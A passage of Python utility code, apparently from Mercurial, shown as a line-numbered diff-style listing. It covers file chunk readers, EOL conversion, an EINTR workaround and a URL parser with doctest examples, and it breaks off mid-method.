2267 def filechunkiter(f, size=131072, limit=None):
2280 def filechunkiter(f, size=131072, limit=None):
2268 """Create a generator that produces the data in the file size
2281 """Create a generator that produces the data in the file size
2269 (default 131072) bytes at a time, up to optional limit (default is
2282 (default 131072) bytes at a time, up to optional limit (default is
2270 to read all data). Chunks may be less than size bytes if the
2283 to read all data). Chunks may be less than size bytes if the
2271 chunk is the last chunk in the file, or the file is a socket or
2284 chunk is the last chunk in the file, or the file is a socket or
2272 some other type of file that sometimes reads less data than is
2285 some other type of file that sometimes reads less data than is
2273 requested."""
2286 requested."""
2274 assert size >= 0
2287 assert size >= 0
2275 assert limit is None or limit >= 0
2288 assert limit is None or limit >= 0
2276 while True:
2289 while True:
2277 if limit is None:
2290 if limit is None:
2278 nbytes = size
2291 nbytes = size
2279 else:
2292 else:
2280 nbytes = min(limit, size)
2293 nbytes = min(limit, size)
2281 s = nbytes and f.read(nbytes)
2294 s = nbytes and f.read(nbytes)
2282 if not s:
2295 if not s:
2283 break
2296 break
2284 if limit:
2297 if limit:
2285 limit -= len(s)
2298 limit -= len(s)
2286 yield s
2299 yield s
2287
2300
2288 class cappedreader(object):
2301 class cappedreader(object):
2289 """A file object proxy that allows reading up to N bytes.
2302 """A file object proxy that allows reading up to N bytes.
2290
2303
2291 Given a source file object, instances of this type allow reading up to
2304 Given a source file object, instances of this type allow reading up to
2292 N bytes from that source file object. Attempts to read past the allowed
2305 N bytes from that source file object. Attempts to read past the allowed
2293 limit are treated as EOF.
2306 limit are treated as EOF.
2294
2307
2295 It is assumed that I/O is not performed on the original file object
2308 It is assumed that I/O is not performed on the original file object
2296 in addition to I/O that is performed by this instance. If there is,
2309 in addition to I/O that is performed by this instance. If there is,
2297 state tracking will get out of sync and unexpected results will ensue.
2310 state tracking will get out of sync and unexpected results will ensue.
2298 """
2311 """
2299 def __init__(self, fh, limit):
2312 def __init__(self, fh, limit):
2300 """Allow reading up to <limit> bytes from <fh>."""
2313 """Allow reading up to <limit> bytes from <fh>."""
2301 self._fh = fh
2314 self._fh = fh
2302 self._left = limit
2315 self._left = limit
2303
2316
2304 def read(self, n=-1):
2317 def read(self, n=-1):
2305 if not self._left:
2318 if not self._left:
2306 return b''
2319 return b''
2307
2320
2308 if n < 0:
2321 if n < 0:
2309 n = self._left
2322 n = self._left
2310
2323
2311 data = self._fh.read(min(n, self._left))
2324 data = self._fh.read(min(n, self._left))
2312 self._left -= len(data)
2325 self._left -= len(data)
2313 assert self._left >= 0
2326 assert self._left >= 0
2314
2327
2315 return data
2328 return data
2316
2329
2317 def readinto(self, b):
2330 def readinto(self, b):
2318 res = self.read(len(b))
2331 res = self.read(len(b))
2319 if res is None:
2332 if res is None:
2320 return None
2333 return None
2321
2334
2322 b[0:len(res)] = res
2335 b[0:len(res)] = res
2323 return len(res)
2336 return len(res)
2324
2337
2325 def unitcountfn(*unittable):
2338 def unitcountfn(*unittable):
2326 '''return a function that renders a readable count of some quantity'''
2339 '''return a function that renders a readable count of some quantity'''
2327
2340
2328 def go(count):
2341 def go(count):
2329 for multiplier, divisor, format in unittable:
2342 for multiplier, divisor, format in unittable:
2330 if abs(count) >= divisor * multiplier:
2343 if abs(count) >= divisor * multiplier:
2331 return format % (count / float(divisor))
2344 return format % (count / float(divisor))
2332 return unittable[-1][2] % count
2345 return unittable[-1][2] % count
2333
2346
2334 return go
2347 return go
2335
2348
2336 def processlinerange(fromline, toline):
2349 def processlinerange(fromline, toline):
2337 """Check that linerange <fromline>:<toline> makes sense and return a
2350 """Check that linerange <fromline>:<toline> makes sense and return a
2338 0-based range.
2351 0-based range.
2339
2352
2340 >>> processlinerange(10, 20)
2353 >>> processlinerange(10, 20)
2341 (9, 20)
2354 (9, 20)
2342 >>> processlinerange(2, 1)
2355 >>> processlinerange(2, 1)
2343 Traceback (most recent call last):
2356 Traceback (most recent call last):
2344 ...
2357 ...
2345 ParseError: line range must be positive
2358 ParseError: line range must be positive
2346 >>> processlinerange(0, 5)
2359 >>> processlinerange(0, 5)
2347 Traceback (most recent call last):
2360 Traceback (most recent call last):
2348 ...
2361 ...
2349 ParseError: fromline must be strictly positive
2362 ParseError: fromline must be strictly positive
2350 """
2363 """
2351 if toline - fromline < 0:
2364 if toline - fromline < 0:
2352 raise error.ParseError(_("line range must be positive"))
2365 raise error.ParseError(_("line range must be positive"))
2353 if fromline < 1:
2366 if fromline < 1:
2354 raise error.ParseError(_("fromline must be strictly positive"))
2367 raise error.ParseError(_("fromline must be strictly positive"))
2355 return fromline - 1, toline
2368 return fromline - 1, toline
2356
2369
2357 bytecount = unitcountfn(
2370 bytecount = unitcountfn(
2358 (100, 1 << 30, _('%.0f GB')),
2371 (100, 1 << 30, _('%.0f GB')),
2359 (10, 1 << 30, _('%.1f GB')),
2372 (10, 1 << 30, _('%.1f GB')),
2360 (1, 1 << 30, _('%.2f GB')),
2373 (1, 1 << 30, _('%.2f GB')),
2361 (100, 1 << 20, _('%.0f MB')),
2374 (100, 1 << 20, _('%.0f MB')),
2362 (10, 1 << 20, _('%.1f MB')),
2375 (10, 1 << 20, _('%.1f MB')),
2363 (1, 1 << 20, _('%.2f MB')),
2376 (1, 1 << 20, _('%.2f MB')),
2364 (100, 1 << 10, _('%.0f KB')),
2377 (100, 1 << 10, _('%.0f KB')),
2365 (10, 1 << 10, _('%.1f KB')),
2378 (10, 1 << 10, _('%.1f KB')),
2366 (1, 1 << 10, _('%.2f KB')),
2379 (1, 1 << 10, _('%.2f KB')),
2367 (1, 1, _('%.0f bytes')),
2380 (1, 1, _('%.0f bytes')),
2368 )
2381 )
2369
2382
2370 class transformingwriter(object):
2383 class transformingwriter(object):
2371 """Writable file wrapper to transform data by function"""
2384 """Writable file wrapper to transform data by function"""
2372
2385
2373 def __init__(self, fp, encode):
2386 def __init__(self, fp, encode):
2374 self._fp = fp
2387 self._fp = fp
2375 self._encode = encode
2388 self._encode = encode
2376
2389
2377 def close(self):
2390 def close(self):
2378 self._fp.close()
2391 self._fp.close()
2379
2392
2380 def flush(self):
2393 def flush(self):
2381 self._fp.flush()
2394 self._fp.flush()
2382
2395
2383 def write(self, data):
2396 def write(self, data):
2384 return self._fp.write(self._encode(data))
2397 return self._fp.write(self._encode(data))
2385
2398
2386 # Matches a single EOL which can either be a CRLF where repeated CR
2399 # Matches a single EOL which can either be a CRLF where repeated CR
2387 # are removed or a LF. We do not care about old Macintosh files, so a
2400 # are removed or a LF. We do not care about old Macintosh files, so a
2388 # stray CR is an error.
2401 # stray CR is an error.
2389 _eolre = remod.compile(br'\r*\n')
2402 _eolre = remod.compile(br'\r*\n')
2390
2403
2391 def tolf(s):
2404 def tolf(s):
2392 return _eolre.sub('\n', s)
2405 return _eolre.sub('\n', s)
2393
2406
2394 def tocrlf(s):
2407 def tocrlf(s):
2395 return _eolre.sub('\r\n', s)
2408 return _eolre.sub('\r\n', s)
2396
2409
2397 def _crlfwriter(fp):
2410 def _crlfwriter(fp):
2398 return transformingwriter(fp, tocrlf)
2411 return transformingwriter(fp, tocrlf)
2399
2412
2400 if pycompat.oslinesep == '\r\n':
2413 if pycompat.oslinesep == '\r\n':
2401 tonativeeol = tocrlf
2414 tonativeeol = tocrlf
2402 fromnativeeol = tolf
2415 fromnativeeol = tolf
2403 nativeeolwriter = _crlfwriter
2416 nativeeolwriter = _crlfwriter
2404 else:
2417 else:
2405 tonativeeol = pycompat.identity
2418 tonativeeol = pycompat.identity
2406 fromnativeeol = pycompat.identity
2419 fromnativeeol = pycompat.identity
2407 nativeeolwriter = pycompat.identity
2420 nativeeolwriter = pycompat.identity
2408
2421
2409 if (pyplatform.python_implementation() == 'CPython' and
2422 if (pyplatform.python_implementation() == 'CPython' and
2410 sys.version_info < (3, 0)):
2423 sys.version_info < (3, 0)):
2411 # There is an issue in CPython that some IO methods do not handle EINTR
2424 # There is an issue in CPython that some IO methods do not handle EINTR
2412 # correctly. The following table shows what CPython version (and functions)
2425 # correctly. The following table shows what CPython version (and functions)
2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2426 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 #
2427 #
2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2428 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 # --------------------------------------------------
2429 # --------------------------------------------------
2417 # fp.__iter__ | buggy | buggy | okay
2430 # fp.__iter__ | buggy | buggy | okay
2418 # fp.read* | buggy | okay [1] | okay
2431 # fp.read* | buggy | okay [1] | okay
2419 #
2432 #
2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2433 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 #
2434 #
2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2435 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2436 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 #
2437 #
2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2438 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2439 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2440 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 # fp.__iter__ but not other fp.read* methods.
2441 # fp.__iter__ but not other fp.read* methods.
2429 #
2442 #
2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2443 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2444 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2445 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2446 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 # to minimize the performance impact.
2447 # to minimize the performance impact.
2435 if sys.version_info >= (2, 7, 4):
2448 if sys.version_info >= (2, 7, 4):
2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2449 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 def _safeiterfile(fp):
2450 def _safeiterfile(fp):
2438 return iter(fp.readline, '')
2451 return iter(fp.readline, '')
2439 else:
2452 else:
2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2453 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 # note: this may block longer than necessary because of bufsize.
2454 # note: this may block longer than necessary because of bufsize.
2442 def _safeiterfile(fp, bufsize=4096):
2455 def _safeiterfile(fp, bufsize=4096):
2443 fd = fp.fileno()
2456 fd = fp.fileno()
2444 line = ''
2457 line = ''
2445 while True:
2458 while True:
2446 try:
2459 try:
2447 buf = os.read(fd, bufsize)
2460 buf = os.read(fd, bufsize)
2448 except OSError as ex:
2461 except OSError as ex:
2449 # os.read only raises EINTR before any data is read
2462 # os.read only raises EINTR before any data is read
2450 if ex.errno == errno.EINTR:
2463 if ex.errno == errno.EINTR:
2451 continue
2464 continue
2452 else:
2465 else:
2453 raise
2466 raise
2454 line += buf
2467 line += buf
2455 if '\n' in buf:
2468 if '\n' in buf:
2456 splitted = line.splitlines(True)
2469 splitted = line.splitlines(True)
2457 line = ''
2470 line = ''
2458 for l in splitted:
2471 for l in splitted:
2459 if l[-1] == '\n':
2472 if l[-1] == '\n':
2460 yield l
2473 yield l
2461 else:
2474 else:
2462 line = l
2475 line = l
2463 if not buf:
2476 if not buf:
2464 break
2477 break
2465 if line:
2478 if line:
2466 yield line
2479 yield line
2467
2480
2468 def iterfile(fp):
2481 def iterfile(fp):
2469 fastpath = True
2482 fastpath = True
2470 if type(fp) is file:
2483 if type(fp) is file:
2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2484 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 if fastpath:
2485 if fastpath:
2473 return fp
2486 return fp
2474 else:
2487 else:
2475 return _safeiterfile(fp)
2488 return _safeiterfile(fp)
2476 else:
2489 else:
2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2490 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 def iterfile(fp):
2491 def iterfile(fp):
2479 return fp
2492 return fp
2480
2493
2481 def iterlines(iterator):
2494 def iterlines(iterator):
2482 for chunk in iterator:
2495 for chunk in iterator:
2483 for line in chunk.splitlines():
2496 for line in chunk.splitlines():
2484 yield line
2497 yield line
2485
2498
2486 def expandpath(path):
2499 def expandpath(path):
2487 return os.path.expanduser(os.path.expandvars(path))
2500 return os.path.expanduser(os.path.expandvars(path))
2488
2501
2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2502 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 """Return the result of interpolating items in the mapping into string s.
2503 """Return the result of interpolating items in the mapping into string s.
2491
2504
2492 prefix is a single character string, or a two character string with
2505 prefix is a single character string, or a two character string with
2493 a backslash as the first character if the prefix needs to be escaped in
2506 a backslash as the first character if the prefix needs to be escaped in
2494 a regular expression.
2507 a regular expression.
2495
2508
2496 fn is an optional function that will be applied to the replacement text
2509 fn is an optional function that will be applied to the replacement text
2497 just before replacement.
2510 just before replacement.
2498
2511
2499 escape_prefix is an optional flag that allows using doubled prefix for
2512 escape_prefix is an optional flag that allows using doubled prefix for
2500 its escaping.
2513 its escaping.
2501 """
2514 """
2502 fn = fn or (lambda s: s)
2515 fn = fn or (lambda s: s)
2503 patterns = '|'.join(mapping.keys())
2516 patterns = '|'.join(mapping.keys())
2504 if escape_prefix:
2517 if escape_prefix:
2505 patterns += '|' + prefix
2518 patterns += '|' + prefix
2506 if len(prefix) > 1:
2519 if len(prefix) > 1:
2507 prefix_char = prefix[1:]
2520 prefix_char = prefix[1:]
2508 else:
2521 else:
2509 prefix_char = prefix
2522 prefix_char = prefix
2510 mapping[prefix_char] = prefix_char
2523 mapping[prefix_char] = prefix_char
2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2524 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2525 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513
2526
2514 def getport(port):
2527 def getport(port):
2515 """Return the port for a given network service.
2528 """Return the port for a given network service.
2516
2529
2517 If port is an integer, it's returned as is. If it's a string, it's
2530 If port is an integer, it's returned as is. If it's a string, it's
2518 looked up using socket.getservbyname(). If there's no matching
2531 looked up using socket.getservbyname(). If there's no matching
2519 service, error.Abort is raised.
2532 service, error.Abort is raised.
2520 """
2533 """
2521 try:
2534 try:
2522 return int(port)
2535 return int(port)
2523 except ValueError:
2536 except ValueError:
2524 pass
2537 pass
2525
2538
2526 try:
2539 try:
2527 return socket.getservbyname(pycompat.sysstr(port))
2540 return socket.getservbyname(pycompat.sysstr(port))
2528 except socket.error:
2541 except socket.error:
2529 raise error.Abort(_("no port number associated with service '%s'")
2542 raise error.Abort(_("no port number associated with service '%s'")
2530 % port)
2543 % port)
2531
2544
2532 class url(object):
2545 class url(object):
2533 r"""Reliable URL parser.
2546 r"""Reliable URL parser.
2534
2547
2535 This parses URLs and provides attributes for the following
2548 This parses URLs and provides attributes for the following
2536 components:
2549 components:
2537
2550
2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539
2552
2540 Missing components are set to None. The only exception is
2553 Missing components are set to None. The only exception is
2541 fragment, which is set to '' if present but empty.
2554 fragment, which is set to '' if present but empty.
2542
2555
2543 If parsefragment is False, fragment is included in query. If
2556 If parsefragment is False, fragment is included in query. If
2544 parsequery is False, query is included in path. If both are
2557 parsequery is False, query is included in path. If both are
2545 False, both fragment and query are included in path.
2558 False, both fragment and query are included in path.
2546
2559
2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548
2561
2549 Note that for backward compatibility reasons, bundle URLs do not
2562 Note that for backward compatibility reasons, bundle URLs do not
2550 take host names. That means 'bundle://../' has a path of '../'.
2563 take host names. That means 'bundle://../' has a path of '../'.
2551
2564
2552 Examples:
2565 Examples:
2553
2566
2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 >>> url(b'file:///home/joe/repo')
2571 >>> url(b'file:///home/joe/repo')
2559 <url scheme: 'file', path: '/home/joe/repo'>
2572 <url scheme: 'file', path: '/home/joe/repo'>
2560 >>> url(b'file:///c:/temp/foo/')
2573 >>> url(b'file:///c:/temp/foo/')
2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 >>> url(b'bundle:foo')
2575 >>> url(b'bundle:foo')
2563 <url scheme: 'bundle', path: 'foo'>
2576 <url scheme: 'bundle', path: 'foo'>
2564 >>> url(b'bundle://../foo')
2577 >>> url(b'bundle://../foo')
2565 <url scheme: 'bundle', path: '../foo'>
2578 <url scheme: 'bundle', path: '../foo'>
2566 >>> url(br'c:\foo\bar')
2579 >>> url(br'c:\foo\bar')
2567 <url path: 'c:\\foo\\bar'>
2580 <url path: 'c:\\foo\\bar'>
2568 >>> url(br'\\blah\blah\blah')
2581 >>> url(br'\\blah\blah\blah')
2569 <url path: '\\\\blah\\blah\\blah'>
2582 <url path: '\\\\blah\\blah\\blah'>
2570 >>> url(br'\\blah\blah\blah#baz')
2583 >>> url(br'\\blah\blah\blah#baz')
2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 >>> url(br'file:///C:\users\me')
2585 >>> url(br'file:///C:\users\me')
2573 <url scheme: 'file', path: 'C:\\users\\me'>
2586 <url scheme: 'file', path: 'C:\\users\\me'>
2574
2587
2575 Authentication credentials:
2588 Authentication credentials:
2576
2589
2577 >>> url(b'ssh://joe:xyz@x/repo')
2590 >>> url(b'ssh://joe:xyz@x/repo')
2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 >>> url(b'ssh://joe@x/repo')
2592 >>> url(b'ssh://joe@x/repo')
2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581
2594
2582 Query strings and fragments:
2595 Query strings and fragments:
2583
2596
2584 >>> url(b'http://host/a?b#c')
2597 >>> url(b'http://host/a?b#c')
2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588
2601
2589 Empty path:
2602 Empty path:
2590
2603
2591 >>> url(b'')
2604 >>> url(b'')
2592 <url path: ''>
2605 <url path: ''>
2593 >>> url(b'#a')
2606 >>> url(b'#a')
2594 <url path: '', fragment: 'a'>
2607 <url path: '', fragment: 'a'>
2595 >>> url(b'http://host/')
2608 >>> url(b'http://host/')
2596 <url scheme: 'http', host: 'host', path: ''>
2609 <url scheme: 'http', host: 'host', path: ''>
2597 >>> url(b'http://host/#a')
2610 >>> url(b'http://host/#a')
2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599
2612
2600 Only scheme:
2613 Only scheme:
2601
2614
2602 >>> url(b'http:')
2615 >>> url(b'http:')
2603 <url scheme: 'http'>
2616 <url scheme: 'http'>
2604 """
2617 """
2605
2618
2606 _safechars = "!~*'()+"
2619 _safechars = "!~*'()+"
2607 _safepchars = "/!~*'()+:\\"
2620 _safepchars = "/!~*'()+:\\"
2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609
2622
2610 def __init__(self, path, parsequery=True, parsefragment=True):
2623 def __init__(self, path, parsequery=True, parsefragment=True):
2611 # We slowly chomp away at path until we have only the path left
2624 # We slowly chomp away at path until we have only the path left
2612 self.scheme = self.user = self.passwd = self.host = None
2625 self.scheme = self.user = self.passwd = self.host = None
2613 self.port = self.path = self.query = self.fragment = None
2626 self.port = self.path = self.query = self.fragment = None
2614 self._localpath = True
2627 self._localpath = True
2615 self._hostport = ''
2628 self._hostport = ''
2616 self._origpath = path
2629 self._origpath = path
2617
2630
2618 if parsefragment and '#' in path:
2631 if parsefragment and '#' in path:
2619 path, self.fragment = path.split('#', 1)
2632 path, self.fragment = path.split('#', 1)
2620
2633
2621 # special case for Windows drive letters and UNC paths
2634 # special case for Windows drive letters and UNC paths
2622 if hasdriveletter(path) or path.startswith('\\\\'):
2635 if hasdriveletter(path) or path.startswith('\\\\'):
2623 self.path = path
2636 self.path = path
2624 return
2637 return
2625
2638
2626 # For compatibility reasons, we can't handle bundle paths as
2639 # For compatibility reasons, we can't handle bundle paths as
2627 # normal URLS
2640 # normal URLS
2628 if path.startswith('bundle:'):
2641 if path.startswith('bundle:'):
2629 self.scheme = 'bundle'
2642 self.scheme = 'bundle'
2630 path = path[7:]
2643 path = path[7:]
2631 if path.startswith('//'):
2644 if path.startswith('//'):
2632 path = path[2:]
2645 path = path[2:]
2633 self.path = path
2646 self.path = path
2634 return
2647 return
2635
2648
2636 if self._matchscheme(path):
2649 if self._matchscheme(path):
2637 parts = path.split(':', 1)
2650 parts = path.split(':', 1)
2638 if parts[0]:
2651 if parts[0]:
2639 self.scheme, path = parts
2652 self.scheme, path = parts
2640 self._localpath = False
2653 self._localpath = False
2641
2654
2642 if not path:
2655 if not path:
2643 path = None
2656 path = None
2644 if self._localpath:
2657 if self._localpath:
2645 self.path = ''
2658 self.path = ''
2646 return
2659 return
2647 else:
2660 else:
2648 if self._localpath:
2661 if self._localpath:
2649 self.path = path
2662 self.path = path
2650 return
2663 return
2651
2664
2652 if parsequery and '?' in path:
2665 if parsequery and '?' in path:
2653 path, self.query = path.split('?', 1)
2666 path, self.query = path.split('?', 1)
2654 if not path:
2667 if not path:
2655 path = None
2668 path = None
2656 if not self.query:
2669 if not self.query:
2657 self.query = None
2670 self.query = None
2658
2671
2659 # // is required to specify a host/authority
2672 # // is required to specify a host/authority
2660 if path and path.startswith('//'):
2673 if path and path.startswith('//'):
2661 parts = path[2:].split('/', 1)
2674 parts = path[2:].split('/', 1)
2662 if len(parts) > 1:
2675 if len(parts) > 1:
2663 self.host, path = parts
2676 self.host, path = parts
2664 else:
2677 else:
2665 self.host = parts[0]
2678 self.host = parts[0]
2666 path = None
2679 path = None
2667 if not self.host:
2680 if not self.host:
2668 self.host = None
2681 self.host = None
2669 # path of file:///d is /d
2682 # path of file:///d is /d
2670 # path of file:///d:/ is d:/, not /d:/
2683 # path of file:///d:/ is d:/, not /d:/
2671 if path and not hasdriveletter(path):
2684 if path and not hasdriveletter(path):
2672 path = '/' + path
2685 path = '/' + path
2673
2686
2674 if self.host and '@' in self.host:
2687 if self.host and '@' in self.host:
2675 self.user, self.host = self.host.rsplit('@', 1)
2688 self.user, self.host = self.host.rsplit('@', 1)
2676 if ':' in self.user:
2689 if ':' in self.user:
2677 self.user, self.passwd = self.user.split(':', 1)
2690 self.user, self.passwd = self.user.split(':', 1)
2678 if not self.host:
2691 if not self.host:
2679 self.host = None
2692 self.host = None
2680
2693
2681 # Don't split on colons in IPv6 addresses without ports
2694 # Don't split on colons in IPv6 addresses without ports
2682 if (self.host and ':' in self.host and
2695 if (self.host and ':' in self.host and
2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2696 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 self._hostport = self.host
2697 self._hostport = self.host
2685 self.host, self.port = self.host.rsplit(':', 1)
2698 self.host, self.port = self.host.rsplit(':', 1)
2686 if not self.host:
2699 if not self.host:
2687 self.host = None
2700 self.host = None
2688
2701
2689 if (self.host and self.scheme == 'file' and
2702 if (self.host and self.scheme == 'file' and
2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2703 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2704 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692
2705
2693 self.path = path
2706 self.path = path
2694
2707
2695 # leave the query string escaped
2708 # leave the query string escaped
2696 for a in ('user', 'passwd', 'host', 'port',
2709 for a in ('user', 'passwd', 'host', 'port',
2697 'path', 'fragment'):
2710 'path', 'fragment'):
2698 v = getattr(self, a)
2711 v = getattr(self, a)
2699 if v is not None:
2712 if v is not None:
2700 setattr(self, a, urlreq.unquote(v))
2713 setattr(self, a, urlreq.unquote(v))
2701
2714
2702 @encoding.strmethod
2715 @encoding.strmethod
2703 def __repr__(self):
2716 def __repr__(self):
2704 attrs = []
2717 attrs = []
2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2718 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 'query', 'fragment'):
2719 'query', 'fragment'):
2707 v = getattr(self, a)
2720 v = getattr(self, a)
2708 if v is not None:
2721 if v is not None:
2709 attrs.append('%s: %r' % (a, v))
2722 attrs.append('%s: %r' % (a, v))
2710 return '<url %s>' % ', '.join(attrs)
2723 return '<url %s>' % ', '.join(attrs)
2711
2724
2712 def __bytes__(self):
2725 def __bytes__(self):
2713 r"""Join the URL's components back into a URL string.
2726 r"""Join the URL's components back into a URL string.
2714
2727
2715 Examples:
2728 Examples:
2716
2729
2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2730 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2731 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 'http://user:pw@host:80/?foo=bar&baz=42'
2733 'http://user:pw@host:80/?foo=bar&baz=42'
2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2735 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2736 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 'ssh://user:pw@[::1]:2200//home/joe#'
2737 'ssh://user:pw@[::1]:2200//home/joe#'
2725 >>> bytes(url(b'http://localhost:80//'))
2738 >>> bytes(url(b'http://localhost:80//'))
2726 'http://localhost:80//'
2739 'http://localhost:80//'
2727 >>> bytes(url(b'http://localhost:80/'))
2740 >>> bytes(url(b'http://localhost:80/'))
2728 'http://localhost:80/'
2741 'http://localhost:80/'
2729 >>> bytes(url(b'http://localhost:80'))
2742 >>> bytes(url(b'http://localhost:80'))
2730 'http://localhost:80/'
2743 'http://localhost:80/'
2731 >>> bytes(url(b'bundle:foo'))
2744 >>> bytes(url(b'bundle:foo'))
2732 'bundle:foo'
2745 'bundle:foo'
2733 >>> bytes(url(b'bundle://../foo'))
2746 >>> bytes(url(b'bundle://../foo'))
2734 'bundle:../foo'
2747 'bundle:../foo'
2735 >>> bytes(url(b'path'))
2748 >>> bytes(url(b'path'))
2736 'path'
2749 'path'
2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2750 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 'file:///tmp/foo/bar'
2751 'file:///tmp/foo/bar'
2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2752 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 'file:///c:/tmp/foo/bar'
2753 'file:///c:/tmp/foo/bar'
2741 >>> print(url(br'bundle:foo\bar'))
2754 >>> print(url(br'bundle:foo\bar'))
2742 bundle:foo\bar
2755 bundle:foo\bar
2743 >>> print(url(br'file:///D:\data\hg'))
2756 >>> print(url(br'file:///D:\data\hg'))
2744 file:///D:\data\hg
2757 file:///D:\data\hg
2745 """
2758 """
2746 if self._localpath:
2759 if self._localpath:
2747 s = self.path
2760 s = self.path
2748 if self.scheme == 'bundle':
2761 if self.scheme == 'bundle':
2749 s = 'bundle:' + s
2762 s = 'bundle:' + s
2750 if self.fragment:
2763 if self.fragment:
2751 s += '#' + self.fragment
2764 s += '#' + self.fragment
2752 return s
2765 return s
2753
2766
2754 s = self.scheme + ':'
2767 s = self.scheme + ':'
2755 if self.user or self.passwd or self.host:
2768 if self.user or self.passwd or self.host:
2756 s += '//'
2769 s += '//'
2757 elif self.scheme and (not self.path or self.path.startswith('/')
